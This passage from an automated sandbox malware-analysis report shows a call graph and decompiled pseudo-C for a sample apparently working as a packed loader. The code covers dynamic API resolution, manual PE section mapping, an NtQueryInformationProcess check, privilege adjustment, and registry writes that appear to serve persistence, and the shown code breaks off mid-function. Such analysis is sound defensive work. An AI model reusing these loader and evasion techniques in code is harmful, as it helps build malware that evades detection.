14687->14688 14689 3e1ff0 AdjustTokenPrivileges 14688->14689 14690 3c8226 14689->14690 14690->14683 14691 3c822d SetSecurityInfo 14690->14691 14691->14683 14693 3e200e 14692->14693 14694 3e2019 AdjustTokenPrivileges 14693->14694 14695 3c81ed 14693->14695 14694->14695 14695->14683 14695->14687 14697 3cceab 14696->14697 14698 3cceb0 14696->14698 14697->14671 14699 3ccebc lstrlenW 14698->14699 14700 3ccf41 14698->14700 14699->14700 14701 3ccec7 RegOpenKeyExW RegOpenKeyExW 14699->14701 14700->14671 14702 3ccf22 14701->14702 14703 3ccf03 RegOpenKeyExW 14701->14703 14702->14671 14703->14702 14705 3ccea0 4 API calls 14704->14705 14706 3c97fa 14705->14706 14707 3c9809 RegCreateKeyExW 14706->14707 14708 3c9801 14706->14708 14707->14708 14708->14671 14719 3c32e5 14709->14719 14710 3c334c VariantClear 14710->14719 14711 3c3378 SysFreeString 14711->14719 14712 3c32e9 14712->14604 14712->14605 14713 3c348f VariantClear 14714 3c3412 14713->14714 14714->14712 14714->14713 14717 3c34b7 SysFreeString 14714->14717 14715 3c33f2 SysFreeString 14715->14719 14716 3c9090 2 API calls 14716->14719 14718 3c32c0 2 API calls 14717->14718 14718->14714 14719->14710 14719->14711 14719->14712 14719->14714 14719->14715 14719->14716 14727 3c5c07 14720->14727 14721 3c5c42 LookupAccountSidW 14723 3c5cd5 14721->14723 14724 3c5c61 14721->14724 14722 3c5eff 14722->14608 14726 3c5d37 14723->14726 14728 3d1d90 10 API calls 14723->14728 14724->14608 14725 3cbb40 HeapFree 14725->14722 14790 3c1c70 14726->14790 14727->14721 14762 3c5eed 14727->14762 14730 3c5cf0 memcpy memcpy 14728->14730 14730->14726 14731 3c5d47 14732 3d1d90 10 API calls 14731->14732 14733 3c5d58 14732->14733 14734 3c9090 2 API calls 14733->14734 14735 3c5d65 14734->14735 14736 3c9090 2 API calls 14735->14736 14737 3c5d73 14736->14737 14738 3c5dac 14737->14738 14740 3c9090 2 API calls 14737->14740 14739 3c9090 2 API calls 14738->14739 14741 3c5db7 14739->14741 14742 3c5d83 14740->14742 14743 3c9090 2 API calls 14741->14743 14744 3c9090 2 API calls 14742->14744 14745 3c5dc5 _time64 _localtime64 14743->14745 14744->14738 14746 3c9090 2 API calls 14745->14746 14747 3c5df7 wcsftime 14746->14747 14748 3c5e20 14747->14748 14749 3c9090 2 API calls 14748->14749 14750 3c5e3c 14749->14750 14751 3c9090 2 API calls 14750->14751 14758 3c5e99 14750->14758 14754 3c5e6f 14751->14754 14752 3c9090 2 API calls 14753 3c5ea7 14752->14753 14755 3c8030 10 API calls 14753->14755 14756 3c9090 2 API calls 14754->14756 14757 3c5eb3 14755->14757 14756->14758 14759 3c9090 2 API calls 14757->14759 14758->14752 14760 3c5eda 14759->14760 14761 3cbb40 HeapFree 14760->14761 14761->14762 14762->14722 14762->14725 14764 3e02b0 14763->14764 14764->14614 14766 3c13d7 SysAllocString 14765->14766 14767 3c13f6 14765->14767 14766->14767 14767->14616 14769 3c6417 14768->14769 14770 3c7cfa InterlockedDecrement 14768->14770 14769->14621 14770->14769 14771 3c7d08 14770->14771 14771->14769 14772 3c7d19 14771->14772 14773 3c7d12 SysFreeString 14771->14773 14774 3c7d29 ??3@YAXPAX 14772->14774 14775 3c7d20 ??_V@YAXPAX 14772->14775 14773->14772 14774->14769 14775->14774 14777 3c6d68 14776->14777 14778 3c6d93 14777->14778 14779 3c6d71 GetTokenInformation 14777->14779 14778->14598 14779->14778 14781 3e05a7 14780->14781 14795 3e0320 RegOpenKeyW 14781->14795 14783 3e0634 14783->14598 14784 3e05c1 14784->14783 14798 3e04a0 memset GetTempPathA 14784->14798 14786 3e05f1 GetModuleFileNameW 14804 3e0380 RegCreateKeyExW RegSetValueExW RegCloseKey 14786->14804 14788 3e0624 14789 3e04a0 11 API calls 14788->14789 14789->14783 14791 3d12a0 2 API calls 14790->14791 14792 3c1c8a 14791->14792 14793 3d1d90 10 API calls 14792->14793 14794 3c1c96 14793->14794 14794->14731 14796 3e0369 14795->14796 14797 3e0341 RegQueryValueExW RegCloseKey 14795->14797 14796->14784 14797->14796 14799 3e04f0 14798->14799 14805 3e03d0 CreateFileA WriteFile CloseHandle 14799->14805 14801 3e0531 14806 3e0420 memset CreateProcessA 14801->14806 14804->14788 14805->14801 14807 3e0499 DeleteFileA 14806->14807 14808 3e0474 WaitForSingleObject CloseHandle CloseHandle 14806->14808 14807->14786 14808->14807 14821 3e2403 GetEnvironmentStringsW 15516 401000 15517 401006 15516->15517 15517->15517 15520 401072 15517->15520 15521 40107b 15520->15521 15528 438032 15521->15528 15541 437b9e 15521->15541 15578 438218 15521->15578 15587 43823b 15521->15587 15596 437b96 15521->15596 15522 40100e 15531 438039 15528->15531 15530 438143 15532 43814a 15530->15532 15533 43818b NtQueryInformationProcess 15530->15533 15535 4381aa 15530->15535 15633 401127 15530->15633 15531->15530 15534 401127 34 API calls 15531->15534 15532->15522 15533->15530 15534->15530 15535->15532 15536 401127 34 API calls 15535->15536 15537 438201 15536->15537 15641 3e24b9 15537->15641 15651 3e2480 15537->15651 15665 3cd616 15537->15665 15542 437c09 15541->15542 15543 401127 30 API calls 15541->15543 15544 437c54 GetCurrentProcess 15542->15544 15546 401127 30 API calls 15542->15546 15556 437c21 15542->15556 15543->15542 15545 401127 30 API calls 15544->15545 15547 437c6f 15545->15547 15548 437c3e 15546->15548 15549 401127 30 API calls 15547->15549 15547->15556 15548->15544 15548->15556 15550 437c98 15549->15550 15551 437d98 15550->15551 15555 401127 30 API calls 15550->15555 15550->15556 15552 437ed8 15551->15552 15553 401127 30 API calls 15551->15553 15554 401127 30 API calls 15552->15554 15561 437dbd 15553->15561 15570 437eeb 15554->15570 15555->15550 15556->15522 15557 401127 30 API calls 15559 437f63 LoadLibraryA 15557->15559 15558 401127 30 API calls 15560 438143 15558->15560 15559->15556 15559->15570 15560->15556 15560->15558 15565 43818b NtQueryInformationProcess 15560->15565 15567 4381aa 15560->15567 15561->15552 15564 401127 30 API calls 15561->15564 15562 43802c 15562->15560 15566 401127 30 API calls 15562->15566 15563 401127 30 API calls 15563->15570 15564->15561 15565->15560 15566->15560 15567->15556 15572 401127 30 API calls 15567->15572 15568 437fa7 15569 437fb3 GetProcAddress 15568->15569 15571 401127 30 API calls 15568->15571 15569->15570 15570->15556 15570->15557 15570->15562 15570->15563 15570->15568 15574 437fdb GetProcAddress 15571->15574 15573 438201 15572->15573 15575 3e24b9 4 API calls 15573->15575 15576 3cd616 13 API calls 15573->15576 15577 3e2480 7 API calls 15573->15577 15574->15570 15575->15556 15576->15556 15577->15556 15578->15578 15579 4381d7 15578->15579 15580 43822f 15579->15580 15581 401127 35 API calls 15579->15581 15582 438201 15581->15582 15584 3e24b9 4 API calls 15582->15584 15585 3cd616 13 API calls 15582->15585 15586 3e2480 7 API calls 15582->15586 15583 438207 15583->15522 15584->15583 15585->15583 15586->15583 15588 4381f7 15587->15588 15589 43824f 15587->15589 15590 401127 35 API calls 15588->15590 15591 438201 15590->15591 15593 3e24b9 4 API calls 15591->15593 15594 3cd616 13 API calls 15591->15594 15595 3e2480 7 API calls 15591->15595 15592 438207 15592->15522 15593->15592 15594->15592 15595->15592 15597 401127 30 API calls 15596->15597 15598 437c09 15597->15598 15599 437c54 GetCurrentProcess 15598->15599 15601 401127 30 API calls 15598->15601 15617 437c21 15598->15617 15600 401127 30 API calls 15599->15600 15602 437c6f 15600->15602 15603 437c3e 15601->15603 15604 401127 30 API calls 15602->15604 15602->15617 15603->15599 15603->15617 15610 437c98 15604->15610 15605 437d98 15606 437ed8 15605->15606 15607 401127 30 API calls 15605->15607 15608 401127 30 API calls 15606->15608 15615 437dbd 15607->15615 15612 437eeb 15608->15612 15609 401127 30 API calls 15609->15610 15610->15605 15610->15609 15610->15617 15611 43802c 15621 401127 30 API calls 15611->15621 15623 438143 15611->15623 15612->15611 15613 401127 30 API calls 15612->15613 15612->15617 15618 401127 30 API calls 15612->15618 15624 437fa7 15612->15624 15616 437f63 LoadLibraryA 15613->15616 15614 401127 30 API calls 15614->15623 15615->15606 15619 401127 30 API calls 15615->15619 15616->15612 15616->15617 15617->15522 15618->15612 15619->15615 15620 43818b NtQueryInformationProcess 15620->15623 15621->15623 15622 4381aa 15622->15617 15627 401127 30 API calls 15622->15627 15623->15614 15623->15617 15623->15620 15623->15622 15625 437fb3 GetProcAddress 15624->15625 15626 401127 30 API calls 15624->15626 15625->15612 15629 437fdb GetProcAddress 15626->15629 15628 438201 15627->15628 15630 3e24b9 4 API calls 15628->15630 15631 3cd616 13 API calls 15628->15631 15632 3e2480 7 API calls 15628->15632 15629->15612 15630->15617 15631->15617 15632->15617 15634 401164 15633->15634 15636 438032 35 API calls 15634->15636 15637 437b96 35 API calls 15634->15637 15638 43823b 35 API calls 15634->15638 15639 438218 35 API calls 15634->15639 15640 437b9e 35 API calls 15634->15640 15635 4011ad 15635->15530 15636->15635 15637->15635 15638->15635 15639->15635 15640->15635 15642 3e24cd __initterm_e 15641->15642 15643 3e24e7 _initterm 15642->15643 15644 3e2502 15642->15644 15646 3e24d3 15642->15646 15643->15644 15645 3e2507 InterlockedExchange 15644->15645 15647 3e250f 15644->15647 15645->15647 15646->15532 15647->15646 15648 3e25df 15647->15648 15649 3e2593 exit 15647->15649 15648->15646 15650 3e25e7 _cexit 15648->15650 15649->15647 15650->15646 15652 3e248c Sleep 15651->15652 15653 3e2484 15651->15653 15654 3e2473 InterlockedCompareExchange 15652->15654 15655 3e24af 15653->15655 15656 3e24a5 _amsg_exit 15653->15656 15654->15651 15654->15653 15657 3e24e7 _initterm 15655->15657 15658 3e2502 15655->15658 15656->15655 15657->15658 15659 3e2507 InterlockedExchange 15658->15659 15661 3e250f 15658->15661 15659->15661 15660 3e25ed 15660->15532 15661->15660 15662 3e25df 15661->15662 15663 3e2593 exit 15661->15663 15662->15660 15664 3e25e7 _cexit 15662->15664 15663->15661 15664->15660 15683 3c7131 15665->15683 15667 3cd61b 15668 3e2442 GetStartupInfoW 15667->15668 15669 3e2473 InterlockedCompareExchange 15668->15669 15670 3e2484 15669->15670 15671 3e2480 15669->15671 15673 3e24af 15670->15673 15674 3e24a5 _amsg_exit 15670->15674 15671->15670 15672 3e248c Sleep 15671->15672 15672->15669 15675 3e24e7 _initterm 15673->15675 15676 3e2502 15673->15676 15674->15673 15675->15676 15677 3e2507 InterlockedExchange 15676->15677 15679 3e250f 15676->15679 15677->15679 15678 3e25ed 15678->15532 15679->15678 15680 3e25df 15679->15680 15681 3e2593 exit 15679->15681 15680->15678 15682 3e25e7 _cexit 15680->15682 15681->15679 15682->15678 15684 3c7156 15683->15684 15685 3c7163 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 15683->15685 15684->15685 15686 3c715a 15684->15686 15687 3c71a2 15685->15687 15686->15667 15687->15686 15865 401026 15866 40107b 15865->15866 15868 438032 35 API calls 15866->15868 15869 437b96 35 API calls 15866->15869 15870 43823b 35 API calls 15866->15870 15871 438218 35 API calls 15866->15871 15872 437b9e 35 API calls 15866->15872 15867 4011ad 15868->15867 15869->15867 15870->15867 15871->15867 15872->15867 14809 3c3dd0 ??2@YAPAXI 14810 3c3de5 memset 14809->14810 14812 3c3dfd 14809->14812 14810->14812 14813 3c3e20 14812->14813 14814 3cf250 14812->14814 14815 3c9090 2 API calls 14814->14815 14816 3cf26e LoadLibraryW 14815->14816 14817 3cf2be 14816->14817 14818 3cf292 14816->14818 14817->14812 14819 3c6cb0 2 API calls 14818->14819 14820 3cf29f GetProcAddress 14819->14820 14820->14817 14820->14818

    Executed Functions

    Function 003CEB30, Relevance: 18.2, APIs: 12, Instructions: 197library

    Control-flow Graph

    C-Code - Quality: 100%
    			E003CEB30() {
				char _v104;
				short _v304;
				intOrPtr _t28;
				void* _t29;
				struct HINSTANCE__* _t30;
				struct HINSTANCE__* _t31;
				intOrPtr _t35;
				struct HINSTANCE__* _t39;
				struct HINSTANCE__* _t41;
				_Unknown_base(*)()* _t44;
				_Unknown_base(*)()* _t47;
				_Unknown_base(*)()* _t50;
				_Unknown_base(*)()* _t53;
				_Unknown_base(*)()* _t56;
				_Unknown_base(*)()* _t59;
				_Unknown_base(*)()* _t62;
				_Unknown_base(*)()* _t65;
				_Unknown_base(*)()* _t68;
				_Unknown_base(*)()* _t71;
				intOrPtr _t86;
				struct HINSTANCE__* _t89;
				struct HINSTANCE__* _t90;
				struct HINSTANCE__* _t91;
				struct HINSTANCE__* _t92;
				struct HINSTANCE__* _t93;
				struct HINSTANCE__* _t94;
				struct HINSTANCE__* _t95;
				struct HINSTANCE__* _t96;
				struct HINSTANCE__* _t97;
				struct HINSTANCE__* _t98;
				void* _t99;
				void* _t103;

				_t28 =  *0x3e8628; // 0x622508
				 *0x3e85c0 = 0;
				 *0x3e85bc = 0;
				 *0x3e85c4 = 0;
				_t29 =  *((intOrPtr*)( *((intOrPtr*)(_t28 + 0xf4))))(_t99, _t103);
				_t122 = _t29 - 5;
				if(_t29 <= 5) {
					L14:
					_t30 =  *0x3e85bc; // 0x0
					__eflags = _t30;
					if(_t30 != 0) {
						_t35 =  *0x3e8628; // 0x622508
						 *((intOrPtr*)( *((intOrPtr*)(_t35 + 0x1c))))(_t30);
						 *0x3e85bc = 0;
					}
					goto L16;
				} else {
					E003C9090(_t122,  &_v304, 0x5b);
					_t39 = LoadLibraryW( &_v304); // executed
					 *0x3e85bc = _t39;
					_t123 = _t39;
					if(_t39 == 0) {
						L16:
						_t31 =  *0x3e85c4; // 0x0
						__eflags = _t31;
						if(_t31 != 0) {
							_t86 =  *0x3e8628; // 0x622508
							 *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x1c))))(_t31);
							 *0x3e85c4 = 0;
						}
						__eflags = 0;
						return 0;
					} else {
						E003C9090(_t123,  &_v304, 0x5c);
						_t41 = LoadLibraryW( &_v304);
						 *0x3e85c4 = _t41;
						if(_t41 == 0) {
							goto L14;
						} else {
							E003C6CB0( &_v104, 0x5d);
							_t89 =  *0x3e85bc; // 0x0
							_t44 = GetProcAddress(_t89,  &_v104);
							 *0x3e85d4 = _t44;
							if(_t44 == 0) {
								goto L14;
							} else {
								E003C6CB0( &_v104, 0x5e);
								_t90 =  *0x3e85bc; // 0x0
								_t47 = GetProcAddress(_t90,  &_v104);
								 *0x3e85e8 = _t47;
								if(_t47 == 0) {
									goto L14;
								} else {
									E003C6CB0( &_v104, 0x5f);
									_t91 =  *0x3e85bc; // 0x0
									_t50 = GetProcAddress(_t91,  &_v104);
									 *0x3e85cc = _t50;
									if(_t50 == 0) {
										goto L14;
									} else {
										E003C6CB0( &_v104, 0x60);
										_t92 =  *0x3e85bc; // 0x0
										_t53 = GetProcAddress(_t92,  &_v104);
										 *0x3e85b8 = _t53;
										if(_t53 == 0) {
											goto L14;
										} else {
											E003C6CB0( &_v104, 0x61);
											_t93 =  *0x3e85c4; // 0x0
											_t56 = GetProcAddress(_t93,  &_v104);
											 *0x3e85f4 = _t56;
											if(_t56 == 0) {
												goto L14;
											} else {
												E003C6CB0( &_v104, 0x62);
												_t94 =  *0x3e85c4; // 0x0
												_t59 = GetProcAddress(_t94,  &_v104);
												 *0x3e85e0 = _t59;
												if(_t59 == 0) {
													goto L14;
												} else {
													E003C6CB0( &_v104, 0x63);
													_t95 =  *0x3e85c4; // 0x0
													_t62 = GetProcAddress(_t95,  &_v104);
													 *0x3e85d0 = _t62;
													if(_t62 == 0) {
														goto L14;
													} else {
														E003C6CB0( &_v104, 0x64);
														_t96 =  *0x3e85c4; // 0x0
														_t65 = GetProcAddress(_t96,  &_v104);
														 *0x3e85e4 = _t65;
														if(_t65 == 0) {
															goto L14;
														} else {
															E003C6CB0( &_v104, 0x65);
															_t97 =  *0x3e85c4; // 0x0
															_t68 = GetProcAddress(_t97,  &_v104);
															 *0x3e85f0 = _t68;
															if(_t68 == 0) {
																goto L14;
															} else {
																E003C6CB0( &_v104, 0x66);
																_t98 =  *0x3e85c4; // 0x0
																_t71 = GetProcAddress(_t98,  &_v104);
																 *0x3e85ec = _t71;
																if(_t71 == 0) {
																	goto L14;
																} else {
																	 *0x3e85c0 = 1;
																	return 1;
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}



































    0x003ceb33
    0x003ceb42
    0x003ceb48
    0x003ceb4e
    0x003ceb5a
    0x003ceb5c
    0x003ceb5e
    0x003ced4e
    0x003ced4e
    0x003ced53
    0x003ced55
    0x003ced58
    0x003ced60
    0x003ced62
    0x003ced62
    0x00000000
    0x003ceb64
    0x003ceb6d
    0x003ceb82
    0x003ceb84
    0x003ceb89
    0x003ceb8b
    0x003ced68
    0x003ced68
    0x003ced6d
    0x003ced6f
    0x003ced71
    0x003ced7b
    0x003ced7d
    0x003ced7d
    0x003ced84
    0x003ced8a
    0x003ceb91
    0x003ceb9a
    0x003ceba9
    0x003cebab
    0x003cebb2
    0x00000000
    0x003cebb8
    0x003cebbe
    0x003cebc3
    0x003cebd7
    0x003cebd9
    0x003cebe0
    0x00000000
    0x003cebe6
    0x003cebec
    0x003cebf1
    0x003cebff
    0x003cec01
    0x003cec08
    0x00000000
    0x003cec0e
    0x003cec14
    0x003cec19
    0x003cec27
    0x003cec29
    0x003cec30
    0x00000000
    0x003cec36
    0x003cec3c
    0x003cec41
    0x003cec4f
    0x003cec51
    0x003cec58
    0x00000000
    0x003cec5e
    0x003cec64
    0x003cec69
    0x003cec77
    0x003cec79
    0x003cec80
    0x00000000
    0x003cec86
    0x003cec8c
    0x003cec91
    0x003cec9f
    0x003ceca1
    0x003ceca8
    0x00000000
    0x003cecae
    0x003cecb4
    0x003cecb9
    0x003cecc7
    0x003cecc9
    0x003cecd0
    0x00000000
    0x003cecd2
    0x003cecd8
    0x003cecdd
    0x003ceceb
    0x003ceced
    0x003cecf4
    0x00000000
    0x003cecf6
    0x003cecfc
    0x003ced01
    0x003ced0f
    0x003ced11
    0x003ced18
    0x00000000
    0x003ced1a
    0x003ced20
    0x003ced25
    0x003ced33
    0x003ced35
    0x003ced3c
    0x00000000
    0x003ced3e
    0x003ced44
    0x003ced4d
    0x003ced4d
    0x003ced3c
    0x003ced18
    0x003cecf4
    0x003cecd0
    0x003ceca8
    0x003cec80
    0x003cec58
    0x003cec30
    0x003cec08
    0x003cebe0
    0x003cebb2
    0x003ceb8b

    APIs
    • LoadLibraryW.KERNEL32(?), ref: 003CEB82
    • LoadLibraryW.KERNEL32(?), ref: 003CEBA9
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CEBD7
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CEBFF
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CEC27
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CEC4F
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CEC77
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CEC9F
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CECC7
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CECEB
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CED0F
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CED33
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D1D90, Relevance: 12.1, APIs: 8, Instructions: 98library

    Control-flow Graph

    C-Code - Quality: 100%
    			E003D1D90(long _a4, void* _a8) {
				char _v104;
				void* _t14;
				void* _t15;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t31;
				void* _t32;
				struct HINSTANCE__* _t49;

				_t14 =  *0x3e862c; // 0x160000
				if(_t14 != 0) {
					L7:
					_t32 = _a8;
					if(_t32 == 0) {
						_t15 = RtlAllocateHeap(_t14, 8, _a4); // executed
						return _t15;
					} else {
						return RtlReAllocateHeap(_t14, 8, _t32, _a4);
					}
				} else {
					E003C6CB0( &_v104, 0x6c);
					_t49 = LoadLibraryA( &_v104);
					E003C6CB0( &_v104, 0x6d);
					_t22 = GetProcAddress(_t49,  &_v104);
					 *0x3e8630 = _t22;
					if(_t22 != 0) {
						E003C6CB0( &_v104, 0x6e);
						_t24 = GetProcAddress(_t49,  &_v104);
						 *0x3e863c = _t24;
						if(_t24 == 0) {
							goto L2;
						} else {
							E003C6CB0( &_v104, 0x6f);
							_t28 = GetProcAddress(_t49,  &_v104);
							 *0x3e8638 = _t28;
							if(_t28 == 0) {
								goto L2;
							} else {
								E003C6CB0( &_v104, 0x70);
								_t31 = GetProcAddress(_t49,  &_v104);
								 *0x3e8634 = _t31;
								if(_t31 == 0) {
									goto L2;
								} else {
									_t14 = GetProcessHeap();
									 *0x3e862c = _t14;
									goto L7;
								}
							}
						}
					} else {
						L2:
						return 0;
					}
				}
			}












    0x003d1d93
    0x003d1d9f
    0x003d1e50
    0x003d1e50
    0x003d1e55
    0x003d1e72
    0x003d1e7d
    0x003d1e57
    0x003d1e6a
    0x003d1e6a
    0x003d1da5
    0x003d1dab
    0x003d1dc3
    0x003d1dc5
    0x003d1dd8
    0x003d1dda
    0x003d1de1
    0x003d1df1
    0x003d1dfe
    0x003d1e00
    0x003d1e07
    0x00000000
    0x003d1e09
    0x003d1e0f
    0x003d1e1c
    0x003d1e1e
    0x003d1e25
    0x00000000
    0x003d1e27
    0x003d1e2d
    0x003d1e3a
    0x003d1e3c
    0x003d1e43
    0x00000000
    0x003d1e45
    0x003d1e45
    0x003d1e4b
    0x00000000
    0x003d1e4b
    0x003d1e43
    0x003d1e25
    0x003d1de3
    0x003d1de3
    0x003d1dea
    0x003d1dea
    0x003d1de1

    APIs
    • LoadLibraryA.KERNEL32(?), ref: 003D1DB7
    • GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
    • GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
    • GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
    • GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
    • GetProcessHeap.KERNEL32 ref: 003D1E45
    • RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
    • RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 00437B9E, Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 505librarynative

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 220 437b9e-437c02 221 437c09-437c13 220->221 222 437c04 call 401127 220->222 223 437c15-437c1f 221->223 224 437c54-437c79 GetCurrentProcess call 401127 221->224 222->221 225 437c21 223->225 226 437c2d-437c48 call 401127 223->226 232 437c85-437cb0 call 401127 224->232 233 437c7b 224->233 229 43820e-438213 225->229 226->224 234 437c4a 226->234 237 437cb9-437cc3 232->237 233->229 234->229 238 437cc9-437ce3 237->238 239 437d98-437da4 237->239 242 437cf7-437d04 238->242 243 437ce5-437cf5 238->243 240 437daa-437dc8 call 401127 239->240 241 437ed8-437ef6 call 401127 239->241 240->241 251 437dce-437dd4 240->251 252 43802c-438043 241->252 253 437efc-437f02 241->253 246 437d07-437d3a call 401127 242->246 243->246 254 437d46-437d66 call 401127 246->254 255 437d3c 246->255 251->241 257 437dda-437dfe 251->257 262 438159 252->262 263 438049-43805b 252->263 258 437f34-437f4f 253->258 259 437f04-437f0b 253->259 283 437d93 254->283 284 437d68-437d90 call 401127 254->284 255->229 260 437e01-437e0d 257->260 265 437f53-437f73 call 401127 LoadLibraryA 258->265 266 437f51 258->266 259->258 261 437f0d-437f14 259->261 267 437e13-437e1f 260->267 268 437ec7-437ed3 260->268 261->258 269 437f16-437f1d 261->269 274 438160-438176 call 401127 262->274 270 4380bd-4380cf 263->270 271 43805d-43806f 263->271 298 437f75 265->298 299 437f7f-437f9c call 401127 265->299 266->253 276 437e21-437e5c call 401127 267->276 277 437e5e-437e6a 267->277 268->251 269->258 278 437f1f-437f25 269->278 279 4380d1-4380e3 270->279 280 4380f7-438109 270->280 281 438071-438083 271->281 282 438097-4380a9 271->282 308 438182-438189 274->308 309 438178 274->309 291 437eba-437ec2 276->291 277->291 292 437e6c-437eb7 call 401127 277->292 278->258 288 437f27-437f2e 278->288 289 4380e5-4380ec 279->289 290 4380ee 279->290 295 438114 280->295 296 43810b-438112 280->296 293 438085-43808c 281->293 294 43808e 281->294 301 4380b4 282->301 302 4380ab-4380b2 282->302 283->237 284->283 288->252 288->258 304 4380f5 289->304 290->304 291->260 292->291 312 438095 293->312 294->312 305 43811b-438148 call 401127 295->305 296->305 298->229 318 437f9f-437fa5 299->318 303 4380bb 301->303 302->303 303->305 304->305 323 438154 305->323 324 43814a 305->324 313 4381a1-4381a8 308->313 314 43818b-43819e NtQueryInformationProcess 308->314 309->229 312->303 313->274 319 4381aa-4381ae 313->319 314->313 325 437fa7-437fb1 318->325 326 43801e-438027 318->326 321 4381b0 319->321 322 4381b4-438201 call 401127 319->322 321->229 338 438204 call 3e24b9 322->338 339 438204 call 3cd616 322->339 340 438204 call 3e2480 322->340 323->262 324->229 327 437fb3-437fca GetProcAddress 325->327 328 437fcc-437fef call 401127 GetProcAddress 325->328 326->253 330 437ff2-437ff6 327->330 328->330 335 438002-43801c 330->335 336 437ff8 330->336 335->318 336->229 337 438207 337->229 338->337 339->337 340->337
    C-Code - Quality: 67%
    			E00437B9E(signed int __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed short* _v96;
				unsigned int _v100;
				signed int _v104;
				_Unknown_base(*)()* _v108;
				signed int _v112;
				signed int* _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				void* __esi;
				void* __ebp;
				intOrPtr _t328;
				signed int _t331;
				signed int _t334;
				signed int _t344;
				signed int _t346;
				signed int _t376;
				void* _t377;
				CHAR* _t399;
				struct HINSTANCE__* _t400;
				signed int _t431;
				signed int _t441;
				signed char* _t455;
				signed int* _t460;
				signed int _t483;
				signed int _t501;
				void* _t524;
				void* _t555;
				void* _t557;
				void* _t558;
				void* _t559;
				void* _t560;
				void* _t562;

				_t552 = __edx;
				_v40 = _v40 & 0x00000000;
				_v72 = _v72 & 0x00000000;
				_v64 = _v64 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v32 = _v32 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = _v56 & 0x00000000;
				_v68 = _v68 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_v52 = _v52 & 0x00000000;
				_v44 = _v44 & 0x00000000;
				_v48 = _v48 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_t328 = _a4;
				_t503 = _a4 +  *((intOrPtr*)(_t328 + 0x3c));
				_v72 = _a4 +  *((intOrPtr*)(_t328 + 0x3c));
				_push(0x40);
				_push( *((intOrPtr*)(_v72 + 0x34)));
				_push( *((intOrPtr*)(_v72 + 0x50)));
				_push(0x1a);
				_t331 = E00401127(_v72, _a4 +  *((intOrPtr*)(_t328 + 0x3c)), __edx, _t555, _t556);
				_t558 = _t557 + 0xc;
				_v24 = _t331;
				if(_v24 != 0) {
					L5:
					_v12 = GetCurrentProcess();
					_push(4);
					_push(_v24);
					_push( *((intOrPtr*)(_v72 + 0x54)));
					_push(0x13);
					_t334 = E00401127(_v72, _t503, _t552, _t555, _t556);
					_t559 = _t558 + 0xc;
					_v20 = _t334;
					if(_v20 != 0) {
						_push( *((intOrPtr*)(_v72 + 0x54)));
						_push(_a4);
						_push(_v20);
						_push(0x18);
						E00401127(_v72, _t503, _t552, _t555, _t556);
						_t560 = _t559 + 0xc;
						_v64 = ( *(_v72 + 0x14) & 0x0000ffff) + _v72 + 0x18;
						_v76 = _v76 & 0x00000000;
						while(_v76 < ( *(_v72 + 6) & 0x0000ffff)) {
							_t552 = _v64;
							_t556 = _v64;
							if( *((intOrPtr*)(_v76 * 0x28 + _t552 + 8)) <=  *((intOrPtr*)(_v76 * 0x28 + _v64 + 0x10))) {
								_v132 =  *((intOrPtr*)(_v76 * 0x28 + _v64 + 0x10));
							} else {
								_v132 =  *((intOrPtr*)(_v76 * 0x28 + _v64 + 8));
							}
							_v56 = _v132;
							_t547 = _v64;
							_v68 =  *((intOrPtr*)(_v76 * 0x28 + _v64 + 0xc));
							_push(0x40);
							_push(_v24 + _v68);
							_push(_v56);
							_push(0x13);
